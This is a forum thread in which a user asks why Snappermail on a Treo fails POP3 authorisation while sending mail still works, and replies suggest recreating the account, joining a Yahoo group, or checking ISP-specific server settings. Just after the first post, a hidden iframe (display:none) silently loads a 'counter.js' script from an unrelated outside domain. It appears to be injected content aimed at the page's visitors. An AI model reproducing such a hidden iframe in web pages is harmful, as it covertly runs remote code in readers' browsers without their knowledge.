+ Reply to Thread

Snappermail HELP!

I had snappermail working perfectly a few days ago. I don't know what has changed in the last few days, but I am no longer able to check email on my POP3 server! Strangely, I am able to SEND email without difficulty using the same account. Eudora does not have this problem, though it seems to be taking longer than usual to check mail.

The connection log for Snappermail states: "Invalid authorization. Check username and password. Failed to authorize to POP server on account Account 1. Server replied -ERR authorization failed"

PLEASE HELP!!!
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: Snappermail HELP!

Originally posted by goomba
    I had snappermail working perfectly a few days ago. I don't know what has changed in the last few days, but I am no longer able to check email on my POP3 server! Strangely, I am able to SEND email without difficulty using the same account. Eudora does not have this problem, though it seems to be taking longer than usual to check mail.

The connection log for Snappermail states: "Invalid authorization. Check username and password. Failed to authorize to POP server on account Account 1. Server replied -ERR authorization failed"

PLEASE HELP!!!
    I don't know what the particular problem could be... but if all of the settings appear to be correct for the e-mail account you have set up, then maybe just wipe it out and recreate it.
    Please visit my picture site: Robert-O-Rama :)

Administrator
    fyi, there is a yahoo group for snappermail which is a great help. the developer is there all the time so you should also pose your Snappermail specific questions over there...

I had a similar problem on my Treo. There are some ISP's that require Snappermail to use a different server than most e-mail apps use for some "authentication" reason. Check the Snappermail website to see if your ISP (mine is Earthlink) has a different server requirement.

Try this link: http://www.snappermail.com/support/isp.cfm